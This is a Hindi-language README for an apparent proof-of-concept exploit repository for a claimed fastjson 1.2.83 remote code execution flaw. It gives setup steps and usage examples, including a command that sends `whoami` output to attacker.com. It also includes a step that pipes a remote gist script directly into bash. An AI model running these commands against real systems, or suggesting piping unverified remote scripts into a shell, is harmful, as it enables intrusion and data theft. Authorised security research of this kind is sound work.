
CVE-2026-16723 — Updated!
CVE-2026-16723
CVE-2026-16723
दान करें
PayPal के माध्यम से या नीचे दिए गए QR कोड को स्कैन करके इस प्रोजेक्ट के रखरखाव में सहायता करें।
⚡ सरल उपयोग
इस प्रोजेक्ट का उपयोग केवल सुरक्षित और अधिकृत वातावरण में करें, जैसे:
- स्थानीय वर्चुअल मशीनें
- Docker कंटेनर
- पृथक प्रयोगशाला सेटअप
- अधिकृत पेनेट्रेशन टेस्टिंग वातावरण
उदाहरण सेटअप:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
उदाहरण उपयोग:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
नोट:
- अन्य प्रोजेक्ट से क्लोन करने पर नेस्टेड .git डायरेक्टरी को हटाने के लिए आपको
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -yचलाना होगा - उदा: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
श्रेय या संदर्भ
- https://fearsoff.org/research/fastjson-1-2-83-rce
- https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
- https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch
📚 शैक्षिक सुरक्षा अनुसंधान भंडार
नियंत्रित वातावरण में साइबर सुरक्षा अवधारणाओं को सीखने, परीक्षण करने और शोध करने के लिए एक भंडार।
⚠️ सुरक्षा और कानूनी अस्वीकरण
उद्देश्य
यह भंडार केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है।
इसे उपयोगकर्ताओं को निम्न के बारे में सीखने में मदद करने के लिए डिज़ाइन किया गया है:
- सुरक्षा कमजोरियाँ
- सैंडबॉक्स और आइसोलेशन अवधारणाएँ
- सुरक्षित कोडिंग और रक्षात्मक अभ्यास
केवल अधिकृत उपयोग
इस भंडार का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास अनुमति हो, जैसे:
- व्यक्तिगत प्रयोगशालाएँ या वर्चुअल मशीनें
- Docker या आइसोलेटेड वातावरण
- अधिकृत पेनेट्रेशन टेस्टिंग
- साइबर सुरक्षा प्रशिक्षण या शैक्षणिक अनुसंधान
अनधिकृत या अवैध उपयोग सख्त वर्जित है।
कोई दायित्व नहीं
लेखक और योगदानकर्ता इस प्रोजेक्ट के कारण होने वाली किसी भी क्षति, दुरुपयोग, कानूनी समस्या या हानि के लिए जिम्मेदार नहीं हैं।
इस भंडार का उपयोग करके, आप सहमत होते हैं कि:
- आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं
- आप इसका उपयोग कानूनी और नैतिक रूप से करेंगे
- प्रोजेक्ट बिना किसी वारंटी के प्रदान किया गया है
नैतिक उपयोग
यह प्रोजेक्ट निम्न के लिए है:
- रक्षात्मक सुरक्षा अनुसंधान
- साइबर सुरक्षा शिक्षा
- कमजोरियों के प्रति जागरूकता
- सुरक्षित सिस्टम और सॉफ़्टवेयर अनुसंधान
कृपया जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और सभी लागू कानूनों का अनुपालन करें।
संपर्क
जिम्मेदार प्रकटीकरण या सहयोग के लिए, GitHub के माध्यम से भंडार अनुरक्षक से संपर्क करें।
